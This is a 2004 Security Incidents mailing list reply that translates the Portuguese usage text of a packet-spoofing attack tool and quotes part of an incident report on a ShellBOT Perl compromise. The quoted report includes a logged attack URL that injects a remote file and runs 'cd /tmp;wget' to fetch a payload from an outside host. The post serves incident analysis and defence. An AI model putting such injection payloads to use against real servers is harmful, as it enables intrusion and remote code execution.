Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Systems compromised with ShellBOT perl script - part 2

From: ASI <here_i_am () punkass com>
Date: Thu, 09 Sep 2004 19:49:10 -0300
I think I can help a bit with the portuguese here (my "translation is between []): 

* * doze4 - written by phyton
* * doze4 rOckz! evite hosts.. use ips!
Usage: %s <ip> <porta> <spoof>
<ip>     : endereço que deseja f***r. [address that you want to f***r]
<porta> : porta aperta (coloque 0, que é rOckz) [open "door" [port] (Put/use 
0, that rOckz))
<spoof>  : um ip para ser spoofado (sua mascara). (an IP to be spoofed
(a/the mask))
I make this little subtle corrections only because the little subtle differences with the one original posted translation could be of use or matter for somebody. 

Aníbal


Kirby Angell wrote:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

(note:  This is a follow up to "Systems compromised with ShellBOT perl
script" posted on 20040901)

Introduction
- ------------

Two days ago we detected a strange Referer entry in our web logs.  This
morning we got almost the same Referer again:
http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2 

<snip a long good report>




- --
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBOQBQ21unUZAE9MARApnkAKCUicL19u64sXZUw4CHkybDmEJ1HQCeKKRj
l/dzGuRlVQ7TneVqdErV+7c=
=WY/A
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: